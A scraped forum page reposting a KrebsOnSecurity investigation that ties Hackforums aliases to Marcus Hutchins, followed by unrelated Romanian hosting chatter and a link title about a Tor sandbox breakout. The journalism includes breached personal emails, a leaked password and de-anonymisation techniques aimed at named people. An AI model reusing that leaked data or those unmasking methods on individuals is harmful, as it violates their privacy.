In another post, Da Loser brags about how his password stealing program goes undetected by multiple antivirus scanners, pointing to a (now deleted) screenshot at a Photobucket account for a “flipertyjopkins”:
Another screenshot from Da Loser’s postings in June 2009 shows him advertising the Hackblack domain and the Surfallday2day@hotmail.co.uk address:
Hackforums user “Da Loser” advertises his “Hackblack” hosting and points to the surfallday2day email address.
An Internet search for this Hackblack domain reveals a thread on the Web hosting forum MyBB started by a user Flipertyjopkins, who asks other members for help configuring his site, which he lists as http://hackblack.freehost10[dot]com.
Poking around the Web for these nicknames and domains turned up a Youtube user account named Flipertyjopkins that includes several videos uploaded 7-8 years ago that instruct viewers on how to use various types of password-stealing malware. In one of the videos — titled “Hotmail cracker v1.3” — Flipertyjopkins narrates how to use a piece of malware by the same name to steal passwords from unsuspecting victims.
Approximately two minutes and 48 seconds into the video, we can briefly see an MSN Messenger chat window shown behind the Microsoft Notepad application he is using to narrate the video. The video clearly shows that the MSN Messenger client is logged in to with the address “hutchins22@hotmail.com.”
To close out the discussion of Flipertyjopkins, I should note that this email address showed up multiple times in the database leak from Hostinger.co.uk, a British Web hosting company that got hacked in 2015. A copy of that database can be found in several places online, and it shows that one Hostinger customer named Marcus used an account under the email address flipertyjopkins@gmail.com.
According to the leaked user database, the password for that account — “emmy009” — also was used to register two other accounts at Hostinger, including the usernames “hacker” (email address: flipertyjopkins@googlemail.com) and “flipertyjopkins” (email: surfallday2day@hotmail.co.uk).
ELEMENT PRODUCTS/GONE WITH THE WIND
Most of the activities and actions that can be attributed to Iarkey/Flipertyjopkins/Da Loser et. al on Hackforums are fairly small-time — and hardly rise to the level of coding from scratch a complex banking trojan and selling it to cybercriminals.
However, multiple threads on Hackforums state that Hutchins around 2011-2012 switched to two new nicknames that corresponded to users who were far more heavily involved in coding and selling complex malicious software: “Element Products,” and later, “Gone With The Wind.”
Hackforums’ nickname preservation feature leaves little doubt that the user Element Products at some point in 2012 changed his nickname to Gone With the Wind. However, for almost a week I could not see any signs of a connection between these two accounts and the ones previously and obviously associated with Hutchins (Flipertyjopkins, Iarkey, etc.).
In the meantime, I endeavored to find out as much as possible about Element Products — a suite of software and services including a keystroke logger, a “stresser” or online attack service, as well as a “no-distribute” malware scanner.
Unlike legitimate scanning services such as Virustotal — which scan malicious software against dozens of antivirus tools and then share the output with all participating antivirus companies — no-distribute scanners are made and marketed to malware authors who wish to see how broadly their malware is detected without tipping off the antivirus firms to a new, more stealthy version of the code.
Indeed, Element Scanner — which was sold in subscription packages starting at $40 per month — scanned all customer malware with some 37 different antivirus tools. But according to posts from Gone With the Wind, the scanner merely resold the services of scan4you[dot]net, a multiscanner that was extremely powerful and popular for several years across a variety of underground cybercrime forums.
According to a story at Bleepingcomputer.com, scan4you disappeared in July 2017, around the same time that two Latvian men were arrested for running an unnamed no-distribute scanner.
[Side note: Element Scanner was later incorporated as the default scanning application of “Blackshades,” a remote access trojan that was extremely popular on Hackforums for several years until its developers and dozens of customers were arrested in an international law enforcement sting in May 2014. Incidentally, as the story linked in the previous sentence explains, the administrator and owner of Hackforums would play an integral role in setting up many of his forum’s users for the Blackshades sting operation.]
According to one thread on Hackforums, Element Products was sold in 2012 to another Hackforums user named “Dal33t.” This was the nickname used by Ammar Zuberi, a young man from Dubai who — according to this this January 2017 KrebsOnSecurity story — may have been associated with a group of miscreants on Hackforums that specialized in using botnets to take high-profile Web sites offline. Zuberi could not be immediately reached for comment.
I soon discovered that Element Products was by far the least harmful product that this user sold on Hackforums. In a separate thread in 2012, Element Products announces the availability of a new product he had for sale — dubbed the “Ares Form Grabber” — a program that could be used to surreptitiously steal usernames and passwords from victims.
Element Products/Gone With The Wind also advertised himself on Hackforums as an authorized reseller of the infamous exploit kit known as “Blackhole.” Exploit kits are programs made to be stitched into hacked and malicious Web sites so that when visitors browse to the site with outdated and insecure browser plugins the browser is automatically infected with whatever malware the attacker wishes to foist on the victim.
In addition, Element Products ran a “bot shop,” in which he sold access to bots claimed to have enslaved through his own personal use of Blackhole:
Gone With The Wind’s “Bot Shop,” which sold access to computers hacked with the help of the Blackhole exploit kit.
A bit more digging showed that the Element Products user on Hackforums co-sold his wares along with another Hackforums user named “Kill4Joy,” who advertised his contact address as kill4joy@live.com.
Ironically, Hackforums was itself hacked in 2012, and a leaked copy of the user database from that hack shows this Kill4Joy user initially registered on the forum in 2011 with the email address rohang93@live.com.
A reverse WHOIS search at domaintools.com shows that email address was used to register several domain names, including contegoprint.info. The registration records for that domain show that it was registered by a Rohan Gupta from Illinois.
I learned that Gupta is now attending graduate school at the University of Illinois at Urbana-Champaign, where he is studying computer engineering. Reached via telephone, Gupta confirmed that he worked with the Hackforums user Element Products six years ago, but said he only handled sales for the Element Scanner product, which he says was completely legal.
“I was associated with Element Scanner which was non-malicious,” Gupta said. “It wasn’t black hat, and I wasn’t associated with the programming, I just assisted with the sales.”
Gupta said his partner and developer of the software went by the name Michael Chanata and communicated with him via a Skype account registered to the email address atthackers@hotmail.com.
Recall that we heard at the beginning of this story that the name Michael Chanata was tied to Heckforums.net, a domain closely connected to the Iarkey nickname on Hackforums. Curious to see if this Michael Chanata character showed up somewhere on Hackforums, I used the forum’s search function to find out.
The following screenshot from a July 2011 Hackforums thread suggests that Michael Chanata was yet another nickname used by Da Loser, a Hackforums account associated with Marcus Hutchins’ early email addresses and Web sites.
BV1/ORGY
Interesting connections, to be sure, but I wasn’t satisfied with this finding and wanted more conclusive evidence of the supposed link. So I turned to “passive DNS” tools from Farsight Security — which keeps a historic record of which domain names map to which IP addresses.
Using Farsight’s tools, I found that Element Scanner’s various Web sites (elementscanner[dot]com/net/su/ru) were at one point hosted at the Internet address 184.168.88.189 alongside just a handful of other interesting domains, including bigkeshhosting[dot]com and bvnetworks[dot]com.
At first, I didn’t fully recognize the nicknames buried in each of these domains, but a few minutes of searching on Hackforums reminded me that bigkeshhosting[dot]com was a project run by a Hackforums user named “Orgy.”
I originally wrote about Orgy — whose real name is Robert George Danielson — in a 2012 story about a pair of stresser or “booter” (DDoS-for-hire) sites. As noted in that piece, Danielson has had several brushes with the law, including a guilty plea for stealing multiple firearms from the home of a local police chief.
I also learned that the bvnetworks[dot]com domain belonged to Orgy’s good friend and associate on Hackforums — a user who for many years went by the nickname “BV1.” In real life, BV1 is 27-year-old Brendan Johnston, a California man who went to prison in 2014 for his role in selling the Blackshades trojan.
When I discovered the connection to BV1, I searched my inbox for anything related to this nickname. Lo and behold, I found an anonymous tip I’d received through KrebsOnSecurity.com’s contact form in March 2013 which informed me of BV1’s real identity and said he was close friends with Orgy and the Hackforums user Iarkey.
According to this anonymous informant, Iarkey was an administrator of an Internet relay chat (IRC) forum that BV1 and Orgy frequented called irc.voidptr.cz.
“You already know that Orgy is running a new booter, but BV1 claims to have ‘left’ the hacking business because all the information on his family/himself has been leaked on the internet, but that is a lie,” the anonymous tipster wrote. “If you connect to http://irc.voidptr. cz ran by ‘touchme’ aka ‘iarkey’ from hackforums you can usually find both BV1 and Orgy in there.”
TOUCHME/TOUCH MY MALWARE/MAYBE TOUCHME
Until recently, I was unfamiliar with the nickname TouchMe. Naturally, I started digging into Hackforums again. An exhaustive search on the forum shows that TouchMe — and later “Touch Me Maybe” and “Touch My Malware” — were yet other nicknames for the same account.
In a Hackforums post from July 2012, the user Touch Me Maybe pointed to a writeup that he claimed to have authored on his own Web site: touchmymalware.blogspot.com:
The Hackforums user “Touch Me Maybe” seems to refer to his own blog and malware analysis at touchmymalware.blogspot.com, which now redirects to Marcus Hutchins’ blog — Malwaretech.com
If you visit this domain name now, it redirects to Malwaretech.com, which is the same blog that Hutchins was updating for years until his arrest in August.
There are other facts to support a connection between MalwareTech and the IRC forum voidptr.cz: A passive DNS scan for irc.voidptr.cz at Farsight Security shows that at one time the IRC channel was hosted at the Internet address 52.86.95.180 — where it shared space with just one other domain: irc.malwaretech.com.
All of the connections explained in this blog post — and some that weren’t — can be seen in the following mind map that I created with the excellent MindNode Pro for Mac.
A mind map I created to keep track of the myriad data points mentioned in this story. Click the image to enlarge.
Following Hutchins’ arrest, multiple Hackforums members posted what they suspected about his various presences on the forum. In one post from October 2011, Hackforums founder and administrator Jesse “Omniscient” LaBrocca said Iarkey had hundreds of accounts on Hackforums.
In one of the longest threads on Hackforums about Hutchins’ arrest there are several postings from a user named “Previously Known As” who self-identifies in that post and multiple related threads as BV1. In one such post, dated Aug. 7, 2017, BV1 observes that Hutchins failed to successfully separate his online selves from his real life identity.
Brendan “BV1” Johnston says he worried his old friend’s operational security mistakes would one day catch up with him.
“He definitely thought he separated TouchMe/MWT from iarkey/Element,” said BV1. “People warned him, myself included, that people can still connect MWT to iarkey, but he never seemed to care too much. He has so many accounts on HF at this point, I doubt someone will be able to connect all the dots. It sucks that some of the worst accounts have been traced back to him already. He ran a hosting company and a Minecraft server with Orgy and I.”
In a brief interview with KrebsOnSecurity, Brendan “BV1” Johnston said Hutchins was a good friend. Johnston said Hutchins had — like many others who later segued into jobs in the information security industry — initially dabbled in the dark side. But Johnston said his old friend sincerely tried to turn things around in late 2012 — when Gone With the Wind sold most of his coding projects to other Hackforums members and began focusing on blogging about poorly-written malware.
“I feel like I know Marcus better than most people do online, and when I heard about the accusations I was completely shocked,” Johnston said. “He tried for such a long time to steer me down a straight and narrow path that seeing this tied to him didn’t make sense to me at all.”
Let me be clear: I have no information to support the claim that Hutchins authored or sold the Kronos banking trojan. According to the government, Hutchins did so in 2014 on the Dark Web marketplace AlphaBay — which was taken down in July 2017 as part of a coordinated, global law enforcement raid on AlphaBay sellers and buyers alike.
However, the findings in this report suggest that for several years Hutchins enjoyed a fairly successful stint coding malicious software for others, said Nicholas Weaver, a security researcher at the International Computer Science Institute and a lecturer at UC Berkeley.
“It appears like Mr. Hutchins had a significant and prosperous blackhat career that he at least mostly gave up in 2013,” Weaver said. “Which might have been forgotten if it wasn’t for the involuntary British press coverage on WannaCry raising his profile and making him out as a ‘hero’.”
Weaver continued:
“I can easily imagine the Feds taking the opportunity to use a penny-ante charge against a known ‘bad guy’ when they can’t charge for more significant crimes,” he said. “But the Feds would have done far less collateral damage if they actually provided a criminal complaint with these sorts of detail rather than a perfunctory indictment.”
Hutchins did not try to hide the fact that he has written and published unique malware strains, which in the United States at least is a form of protected speech.
In December 2014, for example, Hutchins posted to his Github page the source code to TinyXPB, malware he claims to have written that is designed to seize control of a computer so that the malware loads before the operating system can even boot up.
While the publicly available documents related to his case are light on details, it seems clear that prosecutors can make a case against those who attempt to sell malware to cybercriminals — such as on hacker forums like AlphaBay — if they can demonstrate the accused had knowledge and intent that the malware would be used to commit a crime.
The Justice Department’s indictment against Hutchins suggests that the prosecution is relying heavily on the word of an unnamed co-conspirator who became a confidential informant for the government. Update, 9:08 a.m.: Several readers on Twitter disagreed with the previous statement, noting that U.S. prosecutors have said the other unnamed suspect in the Hutchins indictment is still at large.
Original story:
According to a story at BankInfoSecurity, the evidence submitted by prosecutors for the government includes:
- Statements made by Hutchins after he was arrested.
- A CD containing two audio recordings from a county jail in Nevada where he was detained by the FBI.
- 150 pages of Jabber chats between the defendant and an individual.
- Business records from Apple, Google and Yahoo.
- Statements (350 pages) by the defendant from another internet forum, which were seized by the government in another district.
- Three to four samples of malware.
- A search warrant executed on a third party, which may contain some privileged information.
Hutchins declined to comment for this story, citing his ongoing prosecution. He has pleaded not guilty to all four counts against him, including conspiracy to distribute malicious software with the intent to cause damage to 10 or more affected computers without authorization, and conspiracy to distribute malware designed to intercept protected electronic communications. FBI officials have not yet responded to requests for comment.
Sursa: https://krebsonsecurity.com/2017/09/who-is-marcus-hutchins/
-
-
1 hour ago, QuoVadis said:
Fugi de 1&1 ca de lepra. Printre companiile cu cel mai de rahat customer service & support. Probabil vrei ceva "oferta" de la ei insa daca vrei sa ramai client pe termen lung tot acolo ajungi cu pretul. Sunt client namecheap.com din 2006 si nu am de ce ma plange.
S-a lucrat mult pe partea de customer service & support in ultima perioada.
-
1
-
1
-
-
Daca intri cu IP de Germania, probabil nu e nicio limita.
Tor: Linux sandbox breakout via X11
in Exploituri
Posted
Sursa: https://bugs.chromium.org/p/project-zero/issues/detail?id=1293&desc=2